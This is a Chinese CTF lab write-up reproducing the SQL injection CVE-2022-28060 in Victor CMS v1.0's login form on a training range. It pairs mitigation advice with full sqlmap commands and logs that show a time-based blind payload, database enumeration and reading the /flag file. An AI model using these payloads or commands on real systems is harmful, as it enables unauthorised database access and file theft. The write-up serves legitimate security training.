前言

CVE-2022-28060 是 Victor CMS v1.0 中的一个SQL注入漏洞。该漏洞存在于 /includes/login.php 文件中的 user_name 参数。攻击者可以通过发送特制的 SQL 语句，利用这个漏洞执行未授权的数据库操作，从而访问或修改数据库中的敏感信息。

漏洞详细信息

• 漏洞类型：SQL注入
• 受影响的组件：Victor CMS v1.0
• 攻击途径：远程攻击者可以利用该漏洞，通过发送特制的请求来执行任意的 SQL 语句。
• 漏洞严重性：高 (CVSS v3 基础分数：7.5)​

解决方案

• 使用准备好的语句：采用预编译的 SQL 语句或参数化查询来处理 SQL 请求。
• 输入验证：对所有用户输入进行严格的验证和过滤，确保只接受符合预期格式的输入。
• 最小权限原则：为数据库用户分配最低的权限，确保即使发生注入攻击，攻击者也无法获得过多的权限

春秋云镜靶场是一个专注于网络安全培训和实战演练的平台，旨在通过模拟真实的网络环境和攻击场景，提升用户的网络安全防护能力和实战技能。这个平台主要提供以下功能和特点：

实战演练：

提供各种网络安全攻防演练场景，模拟真实的网络攻击事件，帮助用户在实际操作中掌握网络安全技术。
场景涵盖Web安全、系统安全、网络安全、社工攻击等多个领域。

漏洞复现：

用户可以通过平台对已知的安全漏洞进行复现，了解漏洞的产生原因、利用方法和修复措施。
通过实战操作，帮助用户掌握漏洞利用和防护的技能。

教学培训：

提供系统化的网络安全课程，从基础到高级，覆盖多个安全领域，适合不同水平的用户。
包含理论讲解和实战操作，帮助学员全面提升网络安全知识和实战能力。

竞赛与评测：

定期举办网络安全竞赛，如CTF（Capture The Flag）比赛，激发学员的学习兴趣和动力。提供个人和团队的安全能力评测，帮助学员了解自己的安全技能水平。

资源共享：

平台提供丰富的学习资源，包括教程、工具、案例分析等，方便用户随时查阅和学习。
用户可以在社区中分享经验和资源，互相交流和学习。

春秋云镜靶场适合网络安全从业人员、学生以及对网络安全感兴趣的个人，通过在平台上进行不断的学习和实战演练，可以有效提升网络安全技能和防护能力。

介绍

Victor CMS v1.0 是一个设计用于管理和发布网站内容的开源内容管理系统（CMS）。以下是关于Victor CMS v1.0 的主要特点和功能：

主要特点

1. 内容管理：

   • 提供用户友好的界面，支持创建、编辑和发布网站内容，包括文章、页面和多媒体文件。

2. 用户管理：

   • 允许管理员创建和管理用户账户，设定不同的权限和角色，如管理员和编辑。

3. 主题和定制：

   • 支持多种主题和模板，用户可以根据需求自定义网站的外观和布局。

4. 多语言支持：

   • 提供多语言功能，使得网站内容可以用多种语言呈现，满足全球用户的需求。

5. SEO优化：

   • 集成了搜索引擎优化（SEO）功能，帮助网站内容更容易被搜索引擎索引和检索。

6. 安全性：

   • 考虑了数据安全和用户认证，支持基本的访问控制和身份验证机制。

应用场景

Victor CMS v1.0 适用于小型企业、个人博客和社区网站，提供了一个简单而功能丰富的内容管理平台。用户可以利用其灵活的功能来构建和管理各种类型的网站，从而满足不同用户的需求。

开发和社区支持

作为开源项目，Victor CMS v1.0 提供了开放的开发环境和社区支持。用户可以访问其 GitHub 页面和相关社区论坛，获取技术支持、更新和定制建议。

总结

Victor CMS v1.0 是一个适用于各种网站项目的开源内容管理系统，通过其简单易用的界面和丰富的功能，为用户提供了创建和管理网站内容的便利。如果你对搭建个人网站或小型企业网站感兴趣，Victor CMS v1.0 可能是一个值得考虑的选择。

漏洞复现

打开靶场

加载网页有点抽象，得往下滑才能找到登录框

随便输入数值然后抓包拦截

可以看到是 POST 的形式，复制数据包的值到 txt 文件中

先探测一波，发现 user_name 字段存在 SQL 注入 

┌──(root㉿kali)-[/home/suc2es2]
└─# sqlmap -r sqlmap.txt --batch_____H_____ ___[.]_____ ___ ___  {1.8.4#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 15:56:03 /2024-06-30/[15:56:03] [INFO] parsing HTTP request from 'sqlmap.txt'
[15:56:03] [WARNING] provided value for parameter 'login' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[15:56:03] [INFO] testing connection to the target URL
[15:56:03] [INFO] testing if the target URL content is stable
[15:56:04] [INFO] target URL content is stable
[15:56:04] [INFO] testing if POST parameter 'user_name' is dynamic
[15:56:04] [WARNING] POST parameter 'user_name' does not appear to be dynamic
[15:56:04] [WARNING] heuristic (basic) test shows that POST parameter 'user_name' might not be injectable
[15:56:04] [INFO] testing for SQL injection on POST parameter 'user_name'
[15:56:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:56:04] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:56:04] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:56:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:56:05] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[15:56:06] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:56:06] [INFO] testing 'Generic inline queries'
[15:56:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:56:07] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[15:56:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[15:56:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:56:28] [INFO] POST parameter 'user_name' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[15:56:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:56:28] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
got a 302 redirect to 'http://eci-2ze7i6mdn52cbhya3l8h.cloudeci1.ichunqiu.com/index.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
[15:56:30] [INFO] target URL appears to be UNION injectable with 9 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[15:56:40] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') 
[15:56:40] [INFO] checking if the injection point on POST parameter 'user_name' is a false positive
POST parameter 'user_name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 144 HTTP(s) requests:
---
Parameter: user_name (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: user_name=admin' AND (SELECT 6619 FROM (SELECT(SLEEP(5)))JhxZ) AND 'ofTE'='ofTE&user_password=admin&login=
---
[15:57:10] [INFO] the back-end DBMS is MySQL
[15:57:10] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
back-end DBMS: MySQL >= 5.0.12
[15:57:11] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2ze7i6mdn52cbhya3l8h.cloudeci1.ichunqiu.com'[*] ending @ 15:57:11 /2024-06-30/

暴力破解数据库

┌──(root㉿kali)-[/home/suc2es2]
└─# sqlmap -r sqlmap.txt --batch --dbs_____H_____ ___[,]_____ ___ ___  {1.8.4#stable}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 15:57:32 /2024-06-30/[15:57:32] [INFO] parsing HTTP request from 'sqlmap.txt'
[15:57:32] [WARNING] provided value for parameter 'login' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[15:57:32] [INFO] resuming back-end DBMS 'mysql' 
[15:57:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user_name (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: user_name=admin' AND (SELECT 6619 FROM (SELECT(SLEEP(5)))JhxZ) AND 'ofTE'='ofTE&user_password=admin&login=
---
[15:57:32] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[15:57:32] [INFO] fetching database names
[15:57:32] [INFO] fetching number of databases
[15:57:32] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)     
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[15:57:45] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
5
[15:57:56] [INFO] retrieved: 
[15:58:06] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[16:00:09] [INFO] retrieved: mysql
[16:00:44] [INFO] retrieved: performance_schema
[16:02:46] [INFO] retrieved: php_cms
[16:03:51] [INFO] retrieved: sys
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] php_cms
[*] sys

在 mysql 库中查找文件 flag 

┌──(root㉿kali)-[/home/suc2es2]
└─# sqlmap -r sqlmap.txt --batch -D "mysql" --file-read "/flag"_____H_____ ___["]_____ ___ ___  {1.8.4#stable}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 16:21:11 /2024-06-30/[16:21:11] [INFO] parsing HTTP request from 'sqlmap.txt'
[16:21:11] [WARNING] provided value for parameter 'login' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[16:21:11] [INFO] resuming back-end DBMS 'mysql' 
[16:21:11] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user_name (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: user_name=admin' AND (SELECT 6619 FROM (SELECT(SLEEP(5)))JhxZ) AND 'ofTE'='ofTE&user_password=admin&login=
---
[16:21:11] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[16:21:11] [INFO] fingerprinting the back-end DBMS operating system
[16:21:14] [INFO] the back-end DBMS operating system is Linux
[16:21:14] [INFO] fetching file: '/flag'
[16:21:14] [INFO] retrieved: 
[16:21:14] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
6
[16:21:44] [INFO] adjusting time delay to 1 second due to good response times
66C61677B39623135393033642D313165642D343032632D613232622D6434666537303065656330367D
do you want confirmation that the remote file '/flag' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[16:27:51] [INFO] retrieved: 42
[16:27:59] [INFO] the local file '/root/.local/share/sqlmap/output/eci-2ze7i6mdn52cbhya3l8h.cloudeci1.ichunqiu.com/files/_flag' and the remote file '/flag' have the same size (42 B)
files saved to [1]:
[*] /root/.local/share/sqlmap/output/eci-2ze7i6mdn52cbhya3l8h.cloudeci1.ichunqiu.com/files/_flag (same file)[16:27:59] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2ze7i6mdn52cbhya3l8h.cloudeci1.ichunqiu.com'[*] ending @ 16:27:59 /2024-06-30/

访问 flag 

──(root㉿kali)-[/home/suc2es2]
└─# cat /root/.local/share/sqlmap/output/eci-2ze7i6mdn52cbhya3l8h.cloudeci1.ichunqiu.com/files/_flag
flag{9b15903d-11ed-402c-a22b-d4fe700eec06}